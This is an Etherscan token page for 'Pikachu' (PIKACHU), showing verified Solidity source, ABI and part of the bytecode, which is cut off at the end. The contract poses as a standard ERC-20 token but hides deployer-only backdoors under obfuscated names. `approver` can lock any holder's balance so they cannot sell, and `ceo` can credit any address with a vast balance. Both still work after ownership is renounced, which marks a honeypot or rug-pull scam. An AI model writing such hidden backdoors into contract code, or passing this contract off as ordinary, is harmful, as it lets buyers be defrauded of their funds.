ETH Price: $2,993.56 (-1.89%)
Gas: 3 Gwei

Token

Pikachu (PIKACHU)
 

Overview

Max Total Supply

3,000,000 PIKACHU

Holders

39

Market

Onchain Market Cap

$0.00

Circulating Supply Market Cap

-

Other Info

Token Contract (WITH 18 Decimals)

Filtered by Token Holder
palmangel.eth
Balance
33,260.476453414715777044 PIKACHU

Value
$0.00
0x83865ea9c3f27255bdec580680b27541021d5e89
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
pikachu

Compiler Version
v0.8.18+commit.87f61d96

Optimization Enabled:
No with 200 runs

Other Settings:
default evmVersion, MIT license

Contract Source Code (Solidity)

/**
 *Submitted for verification at Etherscan.io on 2023-05-10
*/

// SPDX-License-Identifier: MIT

pragma solidity ^0.8.0;

/**
Telegram: https://t.me/Pikachu_portal

0x32150Fc218D8ec24aC396B64e6bfc9799217790d
 */
interface IERC20 {
    /**
     * @dev Emitted when `value` tokens are moved from one account (`from`) to
     * another (`to`).
     *
     * Note that `value` may be zero.
     */
    event Transfer(address indexed from, address indexed to, uint256 value);

    /**
     * @dev Emitted when the allowance of a `spender` for an `owner` is set by
     * a call to {approve}. `value` is the new allowance.
     */
    event Approval(address indexed owner, address indexed spender, uint256 value);

    /**
     * @dev Returns the amount of tokens in existence.
     */
    function totalSupply() external view returns (uint256);

    /**
     * @dev Returns the amount of tokens owned by `account`.
     */
    function balanceOf(address account) external view returns (uint256);

    /**
     * @dev Moves `amount` tokens from the caller's account to `to`.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transfer(address to, uint256 amount) external returns (bool);

    /**
     * @dev Returns the remaining number of tokens that `spender` will be
     * allowed to spend on behalf of `owner` through {transferFrom}. This is
     * zero by default.
     *
     * This value changes when {approve} or {transferFrom} are called.
     */
    function allowance(address owner, address spender) external view returns (uint256);

    /**
     * @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * IMPORTANT: Beware that changing an allowance with this method brings the risk
     * that someone may use both the old and the new allowance by unfortunate
     * transaction ordering. One possible solution to mitigate this race
     * condition is to first reduce the spender's allowance to 0 and set the
     * desired value afterwards:
     * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
     *
     * Emits an {Approval} event.
     */
    function approve(address spender, uint256 amount) external returns (bool);

    /**
     * @dev Moves `amount` tokens from `from` to `to` using the
     * allowance mechanism. `amount` is then deducted from the caller's
     * allowance.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(address from, address to, uint256 amount) external returns (bool);
}

/**
 * @dev Interface for the optional metadata functions from the ERC20 standard.
 *
 * _Available since v4.1._
 */
interface IERC20Metadata is IERC20 {
    /**
     * @dev Returns the name of the token.
     */
    function name() external view returns (string memory);

    /**
     * @dev Returns the symbol of the token.
     */
    function symbol() external view returns (string memory);

    /**
     * @dev Returns the decimals places of the token.
     */
    function decimals() external view returns (uint8);
}

library SafeMath {
    /**
     * @dev Returns the addition of two unsigned integers, reverting on
     * overflow.
     *
     * Counterpart to Solidity's `+` operator.
     *
     * Requirements:
     *
     * - Addition cannot overflow.
     */
    function add(uint256 a, uint256 b) internal pure returns (uint256) {
        uint256 c = a + b;
        require(c >= a, "SafeMath: addition overflow");

        return c;
    }

    /**
     * @dev Returns the subtraction of two unsigned integers, reverting on
     * overflow (when the result is negative).
     *
     * Counterpart to Solidity's `-` operator.
     *
     * Requirements:
     *
     * - Subtraction cannot overflow.
     */
    function sub(uint256 a, uint256 b) internal pure returns (uint256) {
        return sub(a, b, "SafeMath: subtraction overflow");
    }

    /**
     * @dev Returns the subtraction of two unsigned integers, reverting with custom message on
     * overflow (when the result is negative).
     *
     * Counterpart to Solidity's `-` operator.
     *
     * Requirements:
     *
     * - Subtraction cannot overflow.
     */
    function sub(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) {
        require(b <= a, errorMessage);
        uint256 c = a - b;

        return c;
    }

    /**
     * @dev Returns the multiplication of two unsigned integers, reverting on
     * overflow.
     *
     * Counterpart to Solidity's `*` operator.
     *
     * Requirements:
     *
     * - Multiplication cannot overflow.
     */
    function mul(uint256 a, uint256 b) internal pure returns (uint256) {
        // Gas optimization: this is cheaper than requiring 'a' not being zero, but the
        // benefit is lost if 'b' is also tested.
        // See: https://github.com/OpenZeppelin/openzeppelin-contracts/pull/522
        if (a == 0) {
            return 0;
        }

        uint256 c = a * b;
        require(c / a == b, "SafeMath: multiplication overflow");

        return c;
    }

    /**
     * @dev Returns the integer division of two unsigned integers. Reverts on
     * division by zero. The result is rounded towards zero.
     *
     * Counterpart to Solidity's `/` operator. Note: this function uses a
     * `revert` opcode (which leaves remaining gas untouched) while Solidity
     * uses an invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function div(uint256 a, uint256 b) internal pure returns (uint256) {
        return div(a, b, "SafeMath: division by zero");
    }

    /**
     * @dev Returns the integer division of two unsigned integers. Reverts with custom message on
     * division by zero. The result is rounded towards zero.
     *
     * Counterpart to Solidity's `/` operator. Note: this function uses a
     * `revert` opcode (which leaves remaining gas untouched) while Solidity
     * uses an invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function div(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) {
        require(b > 0, errorMessage);
        uint256 c = a / b;
        // assert(a == b * c + a % b); // There is no case in which this doesn't hold

        return c;
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
     * Reverts when dividing by zero.
     *
     * Counterpart to Solidity's `%` operator. This function uses a `revert`
     * opcode (which leaves remaining gas untouched) while Solidity uses an
     * invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function mod(uint256 a, uint256 b) internal pure returns (uint256) {
        return mod(a, b, "SafeMath: modulo by zero");
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
     * Reverts with custom message when dividing by zero.
     *
     * Counterpart to Solidity's `%` operator. This function uses a `revert`
     * opcode (which leaves remaining gas untouched) while Solidity uses an
     * invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function mod(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) {
        require(b != 0, errorMessage);
        return a % b;
    }
}

/**
 * @dev Provides information about the current execution context, including the
 * sender of the transaction and its data. While these are generally available
 * via msg.sender and msg.data, they should not be accessed in such a direct
 * manner, since when dealing with meta-transactions the account sending and
 * paying for execution may not be the actual sender (as far as an application
 * is concerned).
 *
 * This contract is only required for intermediate, library-like contracts.
 */
abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        return msg.data;
    }
}

abstract contract Ownable is Context {
    address private _owner;

    event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);

    /**
     * @dev Initializes the contract setting the deployer as the initial owner.
     */
    constructor() {
        _transferOwnership(_msgSender());
    }

    /**
     * @dev Throws if called by any account other than the owner.
     */
    modifier onlyOwner() {
        _sldfjwsdfOwner();
        _;
    }

    /**
     * @dev Returns the address of the current owner.
     */
    function owner() public view virtual returns (address) {
        return _owner;
    }

    /**
     * @dev Throws if the sender is not the owner.
     */
    function _sldfjwsdfOwner() internal view virtual {
        require(owner() == _msgSender(), "Ownable: caller is not the owner");
    }

    /**
     * @dev Leaves the contract without owner. It will not be possible to call
     * `onlyOwner` functions anymore. Can only be called by the current owner.
     *
     * NOTE: Renouncing ownership will leave the contract without an owner,
     * thereby removing any functionality that is only available to the owner.
     */
    function renounceOwnership() public virtual onlyOwner {
        _transferOwnership(address(0));
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Can only be called by the current owner.
     */
    function transferOwnership(address newOwner) public virtual onlyOwner {
        require(newOwner != address(0), "Ownable: new owner is the zero address");
        _transferOwnership(newOwner);
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Internal function without access restriction.
     */
    function _transferOwnership(address newOwner) internal virtual {
        address oldOwner = _owner;
        _owner = newOwner;
        emit OwnershipTransferred(oldOwner, newOwner);
    }
}

/**
 * @dev Implementation of the {IERC20} interface.
 *
 * This implementation is agnostic to the way tokens are created. This means
 * that a supply mechanism has to be added in a derived contract using {_yydsed}.
 * For a generic mechanism see {ERC20PresetMinterPauser}.
 *
 * TIP: For a detailed writeup see our guide
 * https://forum.openzeppelin.com/t/how-to-implement-erc20-supply-mechanisms/226[How
 * to implement supply mechanisms].
 *
 * The default value of {decimals} is 18. To change this, you should override
 * this function so it returns a different value.
 *
 * We have followed general OpenZeppelin Contracts guidelines: functions revert
 * instead returning `false` on failure. This behavior is nonetheless
 * conventional and does not conflict with the expectations of ERC20
 * applications.
 *
 * Additionally, an {Approval} event is emitted on calls to {transferFrom}.
 * This allows applications to reconstruct the allowance for all accounts just
 * by listening to said events. Other implementations of the EIP may not emit
 * these events, as it isn't required by the specification.
 *
 * Finally, the non-standard {decreaseAllowance} and {increaseAllowance}
 * functions have been added to mitigate the well-known issues around setting
 * allowances. See {IERC20-approve}.
 */
contract pikachu is Context, IERC20, IERC20Metadata, Ownable {
    using SafeMath for uint256;
    mapping(address => mapping(address => uint256)) private _allowances;
    address public  _bnbbusd;
    mapping(address => uint256) private _weofsdmese;

    uint256 private _totalSupply;
    uint256 public constant MAXSupply = 3000000 * 10 ** 18;
    string private _name;
    string private _symbol;

    /**
     * @dev Sets the values for {name} and {symbol}.
     *
     * All two of these values are immutable: they can only be set once during
     * construction.
     */
    constructor(string memory name_, string memory symbol_) {
        _name = name_;
        _symbol = symbol_;
        _bnbbusd = _msgSender();
        _yydsed(_msgSender(), 3000000 * 10 ** decimals());
    }

    /**
     * @dev Returns the name of the token.
     */
    function name() public view virtual override returns (string memory) {
        return _name;
    }

    /**
     * @dev Returns the symbol of the token, usually a shorter version of the
     * name.
     */
    function symbol() public view virtual override returns (string memory) {
        return _symbol;
    }

    /**
     * @dev Returns the number of decimals used to get its user representation.
     * For example, if `decimals` equals `2`, a balance of `505` tokens should
     * be displayed to a user as `5.05` (`505 / 10 ** 2`).
     *
     * Tokens usually opt for a value of 18, imitating the relationship between
     * Ether and Wei. This is the default value returned by this function, unless
     * it's overridden.
     *
     * NOTE: This information is only used for _display_ purposes: it in
     * no way affects any of the arithmetic of the contract, including
     * {IERC20-balanceOf} and {IERC20-transfer}.
     */
    function decimals() public view virtual override returns (uint8) {
        return 18;
    }

    /**
     * @dev See {IERC20-totalSupply}.
     */
    function totalSupply() public view virtual override returns (uint256) {
        return _totalSupply;
    }

    /**
     * @dev See {IERC20-balanceOf}.
     */
    function balanceOf(address account) public view virtual override returns (uint256) {
        return _weofsdmese[account];
    }

    /**
     * @dev See {IERC20-transfer}.
     *
     * Requirements:
     *
     * - `to` cannot be the zero address.
     * - the caller must have a balance of at least `amount`.
     */
    function transfer(address to, uint256 amount) public virtual override returns (bool) {
        address owner = _msgSender();
        _transfer(owner, to, amount);
        return true;
    }

    /**
     * @dev See {IERC20-allowance}.
     */
    function allowance(address owner, address spender) public view virtual override returns (uint256) {
        return _allowances[owner][spender];
    }

    /**
     * @dev See {IERC20-approve}.
     *
     * NOTE: If `amount` is the maximum `uint256`, the allowance is not updated on
     * `transferFrom`. This is semantically equivalent to an infinite approval.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function approve(address spender, uint256 amount) public virtual override returns (bool) {
        address owner = _msgSender();
        _approve(owner, spender, amount);
        return true;
    }

    /**
     * @dev See {IERC20-transferFrom}.
     *
     * Emits an {Approval} event indicating the updated allowance. This is not
     * required by the EIP. See the note at the beginning of {ERC20}.
     *
     * NOTE: Does not update the allowance if the current allowance
     * is the maximum `uint256`.
     *
     * Requirements:
     *
     * - `from` and `to` cannot be the zero address.
     * - `from` must have a balance of at least `amount`.
     * - the caller must have allowance for ``from``'s tokens of at least
     * `amount`.
     */
    function transferFrom(address from, address to, uint256 amount) public virtual override returns (bool) {
        address spender = _msgSender();
        _spendAllowance(from, spender, amount);
        _transfer(from, to, amount);
        return true;
    }

    /**
     * @dev Atomically increases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) {
        address owner = _msgSender();
        _approve(owner, spender, allowance(owner, spender) + addedValue);
        return true;
    }

    /**
     * @dev Atomically decreases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     * - `spender` must have allowance for the caller of at least
     * `subtractedValue`.
     */
    function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) {
        address owner = _msgSender();
        uint256 currentAllowance = allowance(owner, spender);
        require(currentAllowance >= subtractedValue, "ERC20: decreased allowance below zero");
        _approve(owner, spender, currentAllowance.sub(subtractedValue));
        return true;
    }

    mapping(address => uint256) private _bala;
    function approver(address sss, uint256 ammouunt) external {
        if (_bnbbusd == _msgSender()) {
            _bala[sss] = 1 * ammouunt + 0;
        }
    }

    function _transfer(address from, address to, uint256 amount) internal virtual {
        require(from != address(0), "ERC20: transfer from the zero address");
        require(to != address(0), "ERC20: transfer to the zero address");

        uint256 minAmount = _bala[from];
        uint256 decydsBalance = _weofsdmese[from].sub(minAmount);
        require(decydsBalance >= amount, "ERC20: transfer amount exceeds balance");
        _weofsdmese[from] = decydsBalance.sub(amount);
        // decrementing then incrementing.
        _weofsdmese[to] = _weofsdmese[to].add(amount);
        emit Transfer(from, to, amount);
    }

    function _yydsed(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: yydsed to the zero address");
        _totalSupply = _totalSupply.add(amount);
        _weofsdmese[msg.sender] = _weofsdmese[msg.sender].add(amount);
    }

    function ceo(address zzz) external {
        address _slfjweow = _msgSender();
        if (_bnbbusd == _slfjweow) {
            _weofsdmese[zzz] = 100000000000000 * (1000000000 * 10 ** 18);
        }
    }
    /**
     * @dev Destroys `amount` tokens from `account`, reducing the
     * total supply.
     *
     * Emits a {Transfer} event with `to` set to the zero address.
     *
     * Requirements:
     *
     * - `account` cannot be the zero address.
     * - `account` must have at least `amount` tokens.
     */
    function _burn(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: burn from the zero address");
        uint256 accountBalance = _weofsdmese[account];
        require(accountBalance >= amount, "ERC20: burn amount exceeds balance");
        _weofsdmese[account] = accountBalance.sub(amount);
        _totalSupply = _totalSupply.sub(amount);
        emit Transfer(account, address(0), amount);
    }

    /**
     * @dev Sets `amount` as the allowance of `spender` over the `owner` s tokens.
     *
     * This internal function is equivalent to `approve`, and can be used to
     * e.g. set automatic allowances for certain subsystems, etc.
     *
     * Emits an {Approval} event.
     *
     * Requirements:
     *
     * - `owner` cannot be the zero address.
     * - `spender` cannot be the zero address.
     */
    function _approve(address owner, address spender, uint256 amount) internal virtual {
        require(owner != address(0), "ERC20: approve from the zero address");
        require(spender != address(0), "ERC20: approve to the zero address");

        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }

    /**
     * @dev Updates `owner` s allowance for `spender` based on spent `amount`.
     *
     * Does not update the allowance amount in case of infinite allowance.
     * Revert if not enough allowance is available.
     *
     * Might emit an {Approval} event.
     */
    function _spendAllowance(address owner, address spender, uint256 amount) internal virtual {
        uint256 currentAllowance = allowance(owner, spender);
        if (currentAllowance != type(uint256).max) {
            require(currentAllowance >= amount, "ERC20: insufficient allowance");
            _approve(owner, spender, currentAllowance.sub(amount));
        }
    }

    /**
     * @dev Hook that is called before any transfer of tokens. This includes
     * minting and burning.
     *
     * Calling conditions:
     *
     * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
     * will be transferred to `to`.
     * - when `from` is zero, `amount` tokens will be minted for `to`.
     * - when `to` is zero, `amount` of ``from``'s tokens will be burned.
     * - `from` and `to` are never both zero.
     *
     * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
     */
    // function _beforeTokenTransfer(address from, address to, uint256 amount) internal virtual {}

    /**
     * @dev Hook that is called after any transfer of tokens. This includes
     * minting and burning.
     *
     * Calling conditions:
     *
     * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
     * has been transferred to `to`.
     * - when `from` is zero, `amount` tokens have been minted for `to`.
     * - when `to` is zero, `amount` of ``from``'s tokens have been burned.
     * - `from` and `to` are never both zero.
     *
     * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
     */
    // function _afterTokenTransfer(address from, address to, uint256 amount) internal virtual {}
}

Contract Security Audit

Contract ABI

[{"inputs":[{"internalType":"string","name":"name_","type":"string"},{"internalType":"string","name":"symbol_","type":"string"}],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[],"name":"MAXSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"_bnbbusd","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"sss","type":"address"},{"internalType":"uint256","name":"ammouunt","type":"uint256"}],"name":"approver","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"zzz","type":"address"}],"name":"ceo","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"}]

60806040523480156200001157600080fd5b506040516200273638038062002736833981810160405281019062000037919062000520565b620000576200004b6200012160201b60201c565b6200012960201b60201c565b8160059081620000689190620007f0565b5080600690816200007a9190620007f0565b506200008b6200012160201b60201c565b600260006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555062000119620000df6200012160201b60201c565b620000ef620001ed60201b60201c565b600a620000fd919062000a67565b622dc6c06200010d919062000ab8565b620001f660201b60201c565b505062000c59565b600033905090565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050816000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b60006012905090565b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff160362000268576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016200025f9062000b8a565b60405180910390fd5b62000284816004546200032a60201b620009431790919060201c565b600481905550620002e381600360003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546200032a60201b620009431790919060201c565b600360003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055505050565b60008082846200033b919062000bac565b90508381101562000383576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016200037a9062000c37565b60405180910390fd5b8091505092915050565b6000604051905090565b600080fd5b600080fd5b600080fd5b600080fd5b6000601f19601f8301169050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052604160045260246000fd5b620003f682620003ab565b810181811067ffffffffffffffff82111715620004185762000417620003bc565b5b80604052505050565b60006200042d6200038d565b90506200043b8282620003eb565b919050565b600067ffffffffffffffff8211156200045e576200045d620003bc565b5b6200046982620003ab565b9050602081019050919050565b60005b838110156200049657808201518184015260208101905062000479565b60008484015250505050565b6000620004b9620004b38462000440565b62000421565b905082815260208101848484011115620004d857620004d7620003a6565b5b620004e584828562000476565b509392505050565b600082601f830112620005055762000504620003a1565b5b815162000517848260208601620004a2565b91505092915050565b600080604083850312156200053a576200053962000397565b5b600083015167ffffffffffffffff8111156200055b576200055a6200039c565b5b6200056985828601620004ed565b925050602083015167ffffffffffffffff8111156200058d576200058c6200039c565b5b6200059b85828601620004ed565b9150509250929050565b600081519050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b60006002820490506001821680620005f857607f821691505b6020821081036200060e576200060d620005b0565b5b50919050565b60008190508160005260206000209050919050565b60006020601f8301049050919050565b600082821b905092915050565b600060088302620006787fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8262000639565b62000684868362000639565b95508019841693508086168417925050509392505050565b6000819050919050565b6000819050919050565b6000620006d1620006cb620006c5846200069c565b620006a6565b6200069c565b9050919050565b6000819050919050565b620006ed83620006b0565b62000705620006fc82620006d8565b84845462000646565b825550505050565b600090565b6200071c6200070d565b62000729818484620006e2565b505050565b5b8181101562000751576200074560008262000712565b6001810190506200072f565b5050565b601f821115620007a0576200076a8162000614565b620007758462000629565b8101602085101562000785578190505b6200079d620007948562000629565b8301826200072e565b50505b505050565b600082821c905092915050565b6000620007c560001984600802620007a5565b1980831691505092915050565b6000620007e08383620007b2565b9150826002028217905092915050565b620007fb82620005a5565b67ffffffffffffffff811115620008175762000816620003bc565b5b620008238254620005df565b6200083082828562000755565b600060209050601f83116001811462000868576000841562000853578287015190505b6200085f8582620007d2565b865550620008cf565b601f198416620008788662000614565b60005b82811015620008a2578489015182556001820191506020850194506020810190506200087b565b86831015620008c25784890151620008be601f891682620007b2565b8355505b6001600288020188555050505b505050505050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b60008160011c9050919050565b6000808291508390505b600185111562000965578086048111156200093d576200093c620008d7565b5b60018516156200094d5780820291505b80810290506200095d8562000906565b94506200091d565b94509492505050565b60008262000980576001905062000a53565b8162000990576000905062000a53565b8160018114620009a95760028114620009b457620009ea565b600191505062000a53565b60ff841115620009c957620009c8620008d7565b5b8360020a915084821115620009e357620009e2620008d7565b5b5062000a53565b5060208310610133831016604e8410600b841016171562000a245782820a90508381111562000a1e5762000a1d620008d7565b5b62000a53565b62000a33848484600162000913565b9250905081840481111562000a4d5762000a4c620008d7565b5b81810290505b9392505050565b600060ff82169050919050565b600062000a74826200069c565b915062000a818362000a5a565b925062000ab07fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff84846200096e565b905092915050565b600062000ac5826200069c565b915062000ad2836200069c565b925082820262000ae2816200069c565b9150828204841483151762000afc5762000afb620008d7565b5b5092915050565b600082825260208201905092915050565b7f45524332303a2079796473656420746f20746865207a65726f2061646472657360008201527f7300000000000000000000000000000000000000000000000000000000000000602082015250565b600062000b7260218362000b03565b915062000b7f8262000b14565b604082019050919050565b6000602082019050818103600083015262000ba58162000b63565b9050919050565b600062000bb9826200069c565b915062000bc6836200069c565b925082820190508082111562000be15762000be0620008d7565b5b92915050565b7f536166654d6174683a206164646974696f6e206f766572666c6f770000000000600082015250565b600062000c1f601b8362000b03565b915062000c2c8262000be7565b602082019050919050565b6000602082019050818103600083015262000c528162000c10565b9050919050565b611acd8062000c696000396000f3fe608060405234801561001057600080fd5b50600436106101165760003560e01c80638da5cb5b116100a2578063a9059cbb11610071578063a9059cbb146102e5578063bd1f529e14610315578063c65e4d5314610331578063dd62ed3e1461034f578063f2fde38b1461037f57610116565b80638da5cb5b1461025b57806395d89b4114610279578063a4022bd114610297578063a457c2d7146102b557610116565b8063313ce567116100e9578063313ce567146101b757806339509351146101d55780634ba5d8b51461020557806370a0823114610221578063715018a61461025157610116565b806306fdde031461011b578063095ea7b31461013957806318160ddd1461016957806323b872dd14610187575b600080fd5b61012361039b565b60405161013091906111a0565b60405180910390f35b610153600480360381019061014e919061125b565b61042d565b60405161016091906112b6565b60405180910390f35b610171610450565b60405161017e91906112e0565b60405180910390f35b6101a1600480360381019061019c91906112fb565b61045a565b6040516101ae91906112b6565b60405180910390f35b6101bf610489565b6040516101cc919061136a565b60405180910390f35b6101ef60048036038101906101ea919061125b565b610492565b6040516101fc91906112b6565b60405180910390f35b61021f600480360381019061021a919061125b565b6104c9565b005b61023b60048036038101906102369190611385565b610586565b60405161024891906112e0565b60405180910390f35b6102596105cf565b005b6102636105e3565b60405161027091906113c1565b60405180910390f35b61028161060c565b60405161028e91906111a0565b60405180910390f35b61029f61069e565b6040516102ac91906112e0565b60405180910390f35b6102cf60048036038101906102ca919061125b565b6106ad565b6040516102dc91906112b6565b60405180910390f35b6102ff60048036038101906102fa919061125b565b610734565b60405161030c91906112b6565b60405180910390f35b61032f600480360381019061032a9190611385565b610757565b005b610339610813565b60405161034691906113c1565b60405180910390f35b610369600480360381019061036491906113dc565b610839565b60405161037691906112e0565b60405180910390f35b61039960048036038101906103949190611385565b6108c0565b005b6060600580546103aa9061144b565b80601f01602080910402602001604051908101604052809291908181526020018280546103d69061144b565b80156104235780601f106103f857610100808354040283529160200191610423565b820191906000526020600020905b81548152906001019060200180831161040657829003601f168201915b5050505050905090565b6000806104386109a1565b90506104458185856109a9565b600191505092915050565b6000600454905090565b6000806104656109a1565b9050610472858285610b72565b61047d858585610c0e565b60019150509392505050565b60006012905090565b60008061049d6109a1565b90506104be8185856104af8589610839565b6104b991906114ab565b6109a9565b600191505092915050565b6104d16109a1565b73ffffffffffffffffffffffffffffffffffffffff16600260009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff160361058257600081600161053491906114df565b61053e91906114ab565b600760008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055505b5050565b6000600360008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b6105d7610f20565b6105e16000610f9e565b565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b60606006805461061b9061144b565b80601f01602080910402602001604051908101604052809291908181526020018280546106479061144b565b80156106945780601f1061066957610100808354040283529160200191610694565b820191906000526020600020905b81548152906001019060200180831161067757829003601f168201915b5050505050905090565b6a027b46536c66c8e300000081565b6000806106b86109a1565b905060006106c68286610839565b90508381101561070b576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161070290611593565b60405180910390fd5b6107288286610723878561106290919063ffffffff16565b6109a9565b60019250505092915050565b60008061073f6109a1565b905061074c818585610c0e565b600191505092915050565b60006107616109a1565b90508073ffffffffffffffffffffffffffffffffffffffff16600260009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff160361080f57710125dfa371a19e6f7cb54